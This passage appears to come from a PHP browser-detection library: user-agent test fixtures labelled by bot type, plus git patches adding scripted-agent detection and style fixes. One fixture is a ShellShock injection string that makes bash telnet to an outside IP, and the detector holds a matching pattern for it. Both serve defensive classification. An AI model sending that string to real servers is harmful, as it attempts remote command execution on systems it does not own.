unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mozilla/5.0 (compatible; Mediapartners-Google/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mediapartners-Google + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google (+http://www.google.com/adsbot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google-Mobile-Apps + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Yahoo! Slurp + Spider + + Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Spider + + Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot/2.0b (+http://search.msn.com/msnbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot-media/1.1 (+http://search.msn.com/msnbot.htm) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Ad bots + + Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Bing + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b + + + + unknown + unknown + unknown + unknown + unknown + unknown + W3C Validator + Tool + + W3C_Validator/1.0 libwww-perl/0.40 + + + + Safari + 8.0 + iOS + 8.1 + iPhone + unknown + Yandex + Spider + + Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexBot/3.0; +http://yandex.com/bots) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Gluten Free + Survey + + Mozilla/5.0 (compatible; Gluten Free Crawler/1.0; 
+http://glutenfreepleasure.com/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Twitter + Preview + + Twitterbot/1.0 + + + + Safari + 8.0.2 + OS X + 10.10.1 + unknown + unknown + Apple + Spider + + Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Paper.li + Spider + + Mozilla/5.0 (compatible; PaperLiBot/2.1; http://support.paper.li/entries/20023257-what-is-paper-li) + + + + unknown + unknown + unknown + unknown + unknown + unknown + SocialRank.io + Survey + + SocialRankIOBot; http://socialrank.io/about + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ahrefs.com Backlink Research Tool + Survey + + Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Majestic12 + Spider + + MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+) + + + + unknown + unknown + unknown + unknown + unknown + unknown + LiveLap + Spider + + LivelapBot/0.2 (http://site.livelap.com/crawler) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Skype + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 + + + + Safari + unknown + Linux + unknown + unknown + unknown + AdBeat + Ad bots + + Mozilla/5.0 (X11; U; Linux x86; %lang_code%) adbeat.com/policy Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 AppleWebKit/532.4 Safari/532.4 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Facebook + Preview + + facebookexternalhit/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + WEBDAV + Tool + + WEBDAV Client + + + + Firefox + 6.0 + Windows + 7 + unknown + unknown + Google Favicon + Scripted Agent + + Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon + + + + unknown + unknown + unknown + unknown + unknown + unknown + MetaURI + Survey + + MetaURI API/2.0 
metauri.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + TLSProbe + Tool + + TLSProbe/1.0 (+https://scan.trustnet.venafi.com/) + + + + Safari + unknown + Linux + unknown + unknown + unknown + Scoop.it + Spider + + Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) imgsizer Safari/537.21 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Netcraft SSL + Survey + + Netcraft SSL Server Survey - contact info@netcraft.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + Curl + Scripted Agent + + curl/7.37.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Python + Scripted Agent + + python-urllib/12.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + GoLang + Scripted Agent + + Go-http-client/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Perl + Scripted Agent + + libwww-perl/1.0 + + + + Firefox + 3.5.3 + Linux + unknown + unknown + unknown + Verisign + Survey + + Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3 + + + + unknown + unknown + Linux + unknown + unknown + unknown + Wget + Tool + + Wget/1.13.4 (linux-gnu) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + ZGrab + Tool + + Mozilla/5.0 zgrab/0.3 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Java + Scripted Agent + + Java/1.6.0_14 + + + + unknown + unknown + unknown + unknown + unknown + unknown + ShellShock exploit + Exploit attempt + + () { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22 () { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq + + + + unknown + unknown + unknown + unknown + unknown + unknown + BrowserShots + Survey + + BrowserShots + + + + unknown + unknown + unknown + unknown + unknown + unknown + Who.is + Spider + + Who.is Bot + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + MageReport + Survey + + Mozilla/5.0 
(www.magereport.com/page/about) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ubermetrics Technologies + Survey + + Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Proximic + Spider + + Mozilla/5.0 (compatible; proximic; +http://www.proximic.com/info/spider.php) + + diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentString.php b/tests/BrowserDetector/Tests/_includes/UserAgentString.php index 919e18e..4bdcfc3 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentString.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentString.php @@ -39,6 +39,16 @@ class UserAgentString */ private $string; + /** + * @var string + */ + private $scriptedAgent; + + /** + * @var string + */ + private $scriptedAgentType; + /** * @return string */ @@ -178,4 +188,40 @@ public function setDeviceVersion($deviceVersion) return $this; } + + /** + * @return string + */ + public function getScriptedAgent() + { + return $this->scriptedAgent; + } + + /** + * @param string $scriptedAgent + * + * @return string + */ + public function setScriptedAgent($scriptedAgent) + { + $this->scriptedAgent = $scriptedAgent; + } + + /** + * @return string + */ + public function getScriptedAgentType() + { + return $this->scriptedAgentType; + } + + /** + * @param string $scriptedAgentType + * + * @return string + */ + public function setScriptedAgentType($scriptedAgentType) + { + $this->scriptedAgentType = $scriptedAgentType; + } } diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php index 08ff5e6..ae62aac 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php @@ -13,16 +13,43 @@ public static function map() { $collection = array(); $xml = new SimpleXmlElement(file_get_contents(FILES . 
DIRECTORY_SEPARATOR . 'UserAgentStrings.xml')); + foreach ($xml->strings->string as $string) { - $string = $string->field; $userAgentString = new UserAgentString(); - $userAgentString->setBrowser((string)$string[0]); - $userAgentString->setBrowserVersion((string)$string[1]); - $userAgentString->setOs((string)$string[2]); - $userAgentString->setOsVersion((string)$string[3]); - $userAgentString->setDevice((string)$string[4]); - $userAgentString->setDeviceVersion((string)$string[5]); - $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)$string[6])); + foreach($string->children() as $child) + { + $attributes = $child->attributes(); + switch($attributes['name']) + { + case "browser": + $userAgentString->setBrowser((string)$child[0]); + break; + case "version": + $userAgentString->setBrowserVersion((string)$child[0]); + break; + case "os": + $userAgentString->setOs((string)$child[0]); + break; + case "os_version": + $userAgentString->setOsVersion((string)$child[0]); + break; + case "device": + $userAgentString->setDevice((string)$child[0]); + break; + case "device_version": + $userAgentString->setDeviceVersion((string)$child[0]); + break; + case "scripted_agent": + $userAgentString->setScriptedAgent((string)$child[0]); + break; + case "scripted_agent_type": + $userAgentString->setScriptedAgentType((string)$child[0]); + break; + case "string": + $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)(string)$child[0])); + break; + } + } $collection[] = $userAgentString; } From 242c2d7d02cf7e26dba19dc12e97f4b9ea6293f6 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 20:16:02 +0100 Subject: [PATCH 10/19] Fix code style --- .../Tests/_includes/UserAgentStringMapper.php | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php index ae62aac..7aba697 100644 --- 
a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php @@ -16,11 +16,9 @@ public static function map() foreach ($xml->strings->string as $string) { $userAgentString = new UserAgentString(); - foreach($string->children() as $child) - { + foreach ($string->children() as $child) { $attributes = $child->attributes(); - switch($attributes['name']) - { + switch ($attributes['name']) { case "browser": $userAgentString->setBrowser((string)$child[0]); break; From 5568a8a0bb5f3e76fbbbd976d53556333d49b16e Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Tue, 11 Apr 2017 21:55:33 -0400 Subject: [PATCH 11/19] Few style changes --- src/Browser.php | 105 +++++++++++--------------- src/BrowserDetector.php | 2 - src/ScriptedAgentDetector.php | 135 ++++++++++++---------------------- 3 files changed, 86 insertions(+), 156 deletions(-) diff --git a/src/Browser.php b/src/Browser.php index 3340f4c..3ae4d23 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -88,7 +88,6 @@ class Browser /** * @param null|string|UserAgent $userAgent - * * @throws \Sinergi\BrowserDetector\InvalidArgumentException */ public function __construct($userAgent = null) @@ -106,13 +105,11 @@ public function __construct($userAgent = null) * Set the name of the Browser. * * @param string $name - * * @return $this */ public function setName($name) { $this->name = (string)$name; - return $this; } @@ -134,7 +131,6 @@ public function getName() * Check to see if the specific browser is valid. * * @param string $name - * * @return bool */ public function isBrowser($name) @@ -146,13 +142,11 @@ public function isBrowser($name) * Set the version of the browser. 
* * @param string $version - * * @return $this */ public function setVersion($version) { $this->version = (string)$version; - return $this; } @@ -180,69 +174,61 @@ public function getVersion() public function detectScriptedAgent() { $ua = $this->getUserAgent()->getUserAgentString(); - if (stripos($ua, 'bot') !== FALSE || - stripos($ua, 'spider') !== FALSE || - stripos($ua, 'crawler') !== FALSE || - stripos($ua, 'preview') !== FALSE || - stripos($ua, 'slurp') !== FALSE || - stripos($ua, 'facebookexternalhit') !== FALSE || - stripos($ua, 'mediapartners') !== FALSE || - stripos($ua, 'google-adwords') !== FALSE || - stripos($ua, 'adxvastfetcher') !== FALSE || - stripos($ua, 'adbeat') !== FALSE || - stripos($ua, 'google favicon') !== FALSE || - stripos($ua, 'webdav client') !== FALSE || - stripos($ua, 'metauri api') !== FALSE || - stripos($ua, 'tlsprobe') !== FALSE || - stripos($ua, 'wpif') !== FALSE || - stripos($ua, 'imgsizer') !== FALSE || - stripos($ua, 'netcraft ssl server survey') !== FALSE || - stripos($ua, 'curl/') !== FALSE || - stripos($ua, 'go-http-client/') !== FALSE || - stripos($ua, 'python') !== FALSE || - stripos($ua, 'libwww') !== FALSE || - stripos($ua, 'wget/') !== FALSE || - stripos($ua, 'zgrab/') !== FALSE || - stripos($ua, 'Java/') !== FALSE || - stripos($ua, '() { :;}; /bin/bash -c') !== FALSE || - stripos($ua, 'browsershots') !== FALSE || - stripos($ua, 'magereport') !== FALSE || - stripos($ua, 'ubermetrics-technologies') !== FALSE || - stripos($ua, 'W3C') !== FALSE || - stripos($ua, 'Validator') !== FALSE || - stripos($ua, 'Jigsaw/') !== FALSE || - stripos($ua, 'bing') !== FALSE || - stripos($ua, 'msn') !== FALSE || - stripos($ua, 'Google Web Preview') !== FALSE || - stripos($ua, 'ips-agent') !== FALSE || - (stripos($ua, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) //ICQ Preview - ) - { + if (stripos($ua, 'bot') !== false || + stripos($ua, 
'spider') !== false || + stripos($ua, 'crawler') !== false || + stripos($ua, 'preview') !== false || + stripos($ua, 'slurp') !== false || + stripos($ua, 'facebookexternalhit') !== false || + stripos($ua, 'mediapartners') !== false || + stripos($ua, 'google-adwords') !== false || + stripos($ua, 'adxvastfetcher') !== false || + stripos($ua, 'adbeat') !== false || + stripos($ua, 'google favicon') !== false || + stripos($ua, 'webdav client') !== false || + stripos($ua, 'metauri api') !== false || + stripos($ua, 'tlsprobe') !== false || + stripos($ua, 'wpif') !== false || + stripos($ua, 'imgsizer') !== false || + stripos($ua, 'netcraft ssl server survey') !== false || + stripos($ua, 'curl/') !== false || + stripos($ua, 'go-http-client/') !== false || + stripos($ua, 'python') !== false || + stripos($ua, 'libwww') !== false || + stripos($ua, 'wget/') !== false || + stripos($ua, 'zgrab/') !== false || + stripos($ua, 'Java/') !== false || + stripos($ua, '() { :;}; /bin/bash -c') !== false || + stripos($ua, 'browsershots') !== false || + stripos($ua, 'magereport') !== false || + stripos($ua, 'ubermetrics-technologies') !== false || + stripos($ua, 'W3C') !== false || + stripos($ua, 'Validator') !== false || + stripos($ua, 'Jigsaw/') !== false || + stripos($ua, 'bing') !== false || + stripos($ua, 'msn') !== false || + stripos($ua, 'Google Web Preview') !== false || + stripos($ua, 'ips-agent') !== false || + (stripos($ua, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) //ICQ Preview + ) { $scriptedAgent = new ScriptedAgent($ua); - if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) - { + if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) { return false; - } - else - { + } else { return $scriptedAgent; } - } - else - { + } else { return false; } } /** * @param bool $isChromeFrame - * * @return $this */ public function setIsChromeFrame($isChromeFrame) { 
$this->isChromeFrame = (bool)$isChromeFrame; - return $this; } @@ -269,14 +255,12 @@ public function isChromeFrame() } /** - * @param bool $isChromeFrame - * + * @param bool $isWebkit * @return $this */ public function setIsWebkit($isWebkit) { $this->isWebkit = (bool)$isWebkit; - return $this; } @@ -304,13 +288,11 @@ public function isWebkit() /** * @param bool $isFacebookWebView - * * @return $this */ public function setIsFacebookWebView($isFacebookWebView) { $this->isFacebookWebView = (bool) $isFacebookWebView; - return $this; } @@ -338,13 +320,11 @@ public function isFacebookWebView() /** * @param bool $isTwitterWebView - * * @return $this */ public function setIsTwitterWebView($isTwitterWebView) { $this->isTwitterWebView = (bool) $isTwitterWebView; - return $this; } @@ -372,13 +352,11 @@ public function isTwitterWebView() /** * @param UserAgent $userAgent - * * @return $this */ public function setUserAgent(UserAgent $userAgent) { $this->userAgent = $userAgent; - return $this; } @@ -398,7 +376,6 @@ public function getUserAgent() public function setIsCompatibilityMode($isCompatibilityMode) { $this->isCompatibilityMode = $isCompatibilityMode; - return $this; } diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index 7fef018..8cbc1ba 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -170,8 +170,6 @@ public static function checkTwitterWebView() return false; } - - /** * Determine if the user is using a BlackBerry. * diff --git a/src/ScriptedAgentDetector.php b/src/ScriptedAgentDetector.php index 2cd6d84..220c3d6 100644 --- a/src/ScriptedAgentDetector.php +++ b/src/ScriptedAgentDetector.php @@ -55,7 +55,7 @@ class ScriptedAgentDetector implements DetectorInterface ); /** - * Routine to determine the browser type. + * Routine to determine the scripted agent type. 
* * @param ScriptedAgent $scriptedAgent * @param UserAgent $userAgent @@ -110,8 +110,7 @@ public static function checkRobotICQ() { //Chrome 51 always provides the Upgrade-Insecure-Requests header. ICQ does not. //But to be extra safe, also check for the russian language which the ICQ bot sets. - if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) - { + if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ICQ); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://icq.com"); @@ -127,8 +126,7 @@ public static function checkRobotICQ() */ public static function checkRobotGoogle() { - if (stripos(self::$userAgentString, "Googlebot") !== false) - { + if (stripos(self::$userAgentString, "Googlebot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); @@ -138,22 +136,19 @@ public static function checkRobotGoogle() || stripos(self::$userAgentString, "Mediapartners-Google") !== false || stripos(self::$userAgentString, "Google-Adwords") !== false || stripos(self::$userAgentString, "AdXVastFetcher-Google") !== false - ) - { + ) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEADS); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); return true; } - if (stripos(self::$userAgentString, "Google Favicon") !== false) - { + if (stripos(self::$userAgentString, "Google Favicon") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEFAVICON); 
self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4626518.htm"); return true; } - if (stripos(self::$userAgentString, "Google Web Preview") !== false) - { + if (stripos(self::$userAgentString, "Google Web Preview") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEPREVIEW); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.distilnetworks.com/bot-directory/bot/google-web-preview/"); @@ -169,8 +164,7 @@ public static function checkRobotGoogle() */ public static function checkRobotBaidu() { - if (stripos(self::$userAgentString, "Baiduspider") !== false) - { + if (stripos(self::$userAgentString, "Baiduspider") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BAIDU); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); @@ -186,8 +180,7 @@ public static function checkRobotBaidu() */ public static function checkRobotFacebook() { - if (stripos(self::$userAgentString, "facebookexternalhit") !== false) - { + if (stripos(self::$userAgentString, "facebookexternalhit") !== false) { self::$scriptedAgent->setName(ScriptedAgent::FACEBOOK); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.facebook.com/externalhit_uatext.php"); @@ -203,30 +196,25 @@ public static function checkRobotFacebook() */ public static function checkRobotBing() { - - if (stripos(self::$userAgentString, "adidxbot/") !== false) - { + if (stripos(self::$userAgentString, "adidxbot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "/bingbot.htm") !== false) - { + if 
(stripos(self::$userAgentString, "/bingbot.htm") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "/msnbot.htm") !== false) - { + if (stripos(self::$userAgentString, "/msnbot.htm") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MSNBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "BingPreview/") !== false) - { + if (stripos(self::$userAgentString, "BingPreview/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING_PREVIEW); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); @@ -243,8 +231,7 @@ public static function checkRobotBing() */ public static function checkRobotSlurp() { - if (stripos(self::$userAgentString, "Yahoo! Slurp") !== false) - { + if (stripos(self::$userAgentString, "Yahoo! 
Slurp") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SLURP); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://help.yahoo.com/kb/SLN22600.html"); @@ -260,8 +247,7 @@ public static function checkRobotSlurp() */ public static function checkRobotTwitter() { - if (stripos(self::$userAgentString, "Twitterbot/") !== false) - { + if (stripos(self::$userAgentString, "Twitterbot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::TWITTER); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("http://stackoverflow.com/questions/22362215/twitter-user-agent-on-sharing"); @@ -277,8 +263,7 @@ public static function checkRobotTwitter() */ public static function checkRobotSkype() { - if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) - { + if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SKYPE); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("http://www.skype.com"); @@ -301,16 +286,14 @@ public static function checkRobotW3CValidator() stripos(self::$userAgentString, "FeedValidator/") !== false || stripos(self::$userAgentString, "Jigsaw/") !== false || stripos(self::$userAgentString, "JW3C_Unicorn/") !== false - ) - { + ) { self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); return true; } if (stripos(self::$userAgentString, "NING/") !== false || - stripos(self::$userAgentString, "W3C-checklink") !== false) - { + stripos(self::$userAgentString, "W3C-checklink") !== false) { self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); @@ -326,8 +309,7 @@ public static function checkRobotW3CValidator() */ public 
static function checkRobotYandex() { - if (stripos(self::$userAgentString, "YandexBot/") !== false) - { + if (stripos(self::$userAgentString, "YandexBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::YANDEX); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://yandex.com/bots"); @@ -343,8 +325,7 @@ public static function checkRobotYandex() */ public static function checkRobotApple() { - if (stripos(self::$userAgentString, "AppleBot/") !== false) - { + if (stripos(self::$userAgentString, "AppleBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::APPLEBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.apple.com/en-gb/HT204683"); @@ -360,8 +341,7 @@ public static function checkRobotApple() */ public static function checkRobotPaperli() { - if (stripos(self::$userAgentString, "PaperLiBot/") !== false) - { + if (stripos(self::$userAgentString, "PaperLiBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PAPERLI); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.paper.li/hc/en-us/articles/204105253-What-is-Paper-li-"); @@ -377,8 +357,7 @@ public static function checkRobotPaperli() */ public static function checkRobotAhrefs() { - if (stripos(self::$userAgentString, "AhrefsBot/") !== false) - { + if (stripos(self::$userAgentString, "AhrefsBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::AHREFS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://ahrefs.com/robot"); @@ -394,8 +373,7 @@ public static function checkRobotAhrefs() */ public static function checkRobotMJ12() { - if (stripos(self::$userAgentString, "MJ12Bot/") !== false) - { + if (stripos(self::$userAgentString, "MJ12Bot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MJ12); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); 
self::$scriptedAgent->setInfoURL("http://www.majestic12.co.uk/projects/dsearch/mj12bot.php"); @@ -411,8 +389,7 @@ public static function checkRobotMJ12() */ public static function checkRobotLiveLap() { - if (stripos(self::$userAgentString, "LivelapBot/") !== false) - { + if (stripos(self::$userAgentString, "LivelapBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::LIVELAP); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://site.livelap.com/crawler.html"); @@ -429,8 +406,7 @@ public static function checkRobotLiveLap() public static function checkRobotWebdav() { if (stripos(self::$userAgentString, "WEBDAV Client") !== false || - stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) //Office Webdav probe - { + stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) { //Office Webdav probe self::$scriptedAgent->setName(ScriptedAgent::WEBDAV); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://en.wikipedia.org/wiki/WebDAV"); @@ -446,8 +422,7 @@ public static function checkRobotWebdav() */ public static function checkRobotMetaURI() { - if (stripos(self::$userAgentString, "MetaURI API/") !== false) - { + if (stripos(self::$userAgentString, "MetaURI API/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::METAURI); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://github.com/stateless-systems/uri-meta"); @@ -463,8 +438,7 @@ public static function checkRobotMetaURI() */ public static function checkRobotTLSProbe() { - if (stripos(self::$userAgentString, "TLSProbe/") !== false) - { + if (stripos(self::$userAgentString, "TLSProbe/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::TLSPROBE); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://bitbucket.org/marco-bellaccini/tlsprobe"); @@ -481,8 +455,7 @@ public static 
function checkRobotTLSProbe() public static function checkRobotScoopIt() { if (stripos(self::$userAgentString, "wpif Safari") !== false - || stripos(self::$userAgentString, "imgsizer Safari") !== false) - { + || stripos(self::$userAgentString, "imgsizer Safari") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SCOOPIT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4785385.htm"); @@ -498,8 +471,7 @@ public static function checkRobotScoopIt() */ public static function checkRobotNetcraft() { - if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) - { + if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) { self::$scriptedAgent->setName(ScriptedAgent::NETCRAFT); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.netcraft.com/internet-data-mining/ssl-survey/"); @@ -515,8 +487,7 @@ public static function checkRobotNetcraft() */ public static function checkRobotCurl() { - if (stripos(self::$userAgentString, "curl/") !== false) - { + if (stripos(self::$userAgentString, "curl/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::CURL); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://curl.haxx.se/"); @@ -533,8 +504,7 @@ public static function checkRobotCurl() public static function checkRobotPython() { if (stripos(self::$userAgentString, "python-requests/") !== false || - stripos(self::$userAgentString, "python-urllib/") !== false) - { + stripos(self::$userAgentString, "python-urllib/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PYTHON); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.python.org/"); @@ -550,8 +520,7 @@ public static function checkRobotPython() */ public static function checkRobotGoLang() { - if (stripos(self::$userAgentString, 
